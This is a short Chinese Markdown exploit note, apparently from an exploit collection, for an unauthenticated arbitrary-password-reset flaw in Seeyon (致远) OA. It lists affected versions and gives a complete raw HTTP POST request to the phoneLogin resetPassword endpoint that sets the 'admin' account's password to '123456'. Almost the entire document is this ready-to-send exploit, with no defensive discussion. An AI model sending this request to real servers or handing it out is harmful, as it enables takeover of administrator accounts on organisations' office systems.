20 lines
347 B
Markdown
20 lines
347 B
Markdown
# 致远OA前台任意用户密码修改漏洞
|
|
|
|
## 版本
|
|
```
|
|
Seeyon OA=V5/G6
|
|
Seeyon OA=V8.1SP2
|
|
Seeyon OA=V8.2
|
|
```
|
|
## exp
|
|
```
|
|
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
|
|
Host: ip
|
|
User-Agent: Go-http-client/1.1
|
|
Content-Length: 24
|
|
Content-Type: application/json
|
|
Accept-Encoding: gzip
|
|
|
|
{"loginName":"admin","password":"123456"}
|
|
```
|